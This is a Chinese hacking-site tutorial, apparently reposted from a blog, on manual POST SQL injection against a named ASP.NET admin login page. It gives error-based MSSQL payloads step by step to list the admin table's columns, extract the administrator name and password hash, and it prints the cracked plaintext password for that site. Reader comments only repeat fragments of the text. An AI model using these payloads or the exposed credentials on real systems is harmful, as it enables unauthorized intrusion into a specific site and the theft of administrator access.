后台post注入爆密码

后台post注入爆密码

黑客学院访客2021-10-12 9:40:009764A+A-

  后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注 入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说 明一下大家不大在意的post注入的手注方法。(以后也会补充一个cookie注入的实战例子)

  http://www.yunsec.net/login.aspx

  1.爆数据库的表段和相关字段

  ' having 11=1–

  说明有表名叫 Sys_Admin 字段有 password

  2.爆Sys_Admin下的其他字段。

  ' group by Sys_Admin.Password having 11=1–

  不知道为何没法用这种方式继续爆表段的其他字段

  失败。

  3 换种方式爆Sys_Admin表段的其他字段

  1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1

  1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1

  这就是我们一开始就和表段一起爆出来的密码字段。

  1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1

  在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。

  由结果可以推断管理员账户是在name字段中,密码是在password字段中。

  4.然后就是分别爆字段内容了

  ' and (select top 1 Sys_Admin.Name from Sys_Admin)>0–

  所以爆出来的是admin

  ' and (select top 1 Sys_Admin.Password from Sys_Admin)>0–

  爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E

  经过破解是:pjxh3100312

  所有后台账户和密码是 admin pjxh3100312

  经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。

    文章来源:http://hackerxian.blog.51cto.com/9240575/1591667

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 只影忆囚2022-05-28 09:13:28
  • 种数据库的使用是非常有必要的。    文章来源:http://hackerxian.blog.51cto.com/9240575/1591667
  • 惑心私野2022-05-28 04:36:44
  • ect_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1  这就是我们一开始就和表段一起爆出来的密码字段。  1' and 1=convert(int,(select top 1 col_name(object_id ('S
  • 听弧神择2022-05-28 01:07:01
  • ogin.aspx  1.爆数据库的表段和相关字段  ' having 11=1–  说明有表名叫 Sys_Admin 字段有 password  2.爆Sys_Admin下的其他字段。  ' gro
  • 馥妴雾月2022-05-28 08:53:40
  • 转换成数据类型 int 时失败。  由结果可以推断管理员账户是在name字段中,密码是在password字段中。  4.然后就是分别爆字段内容了  ' and (select top 1 Sys_Admin.Name from Sys_Admi

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理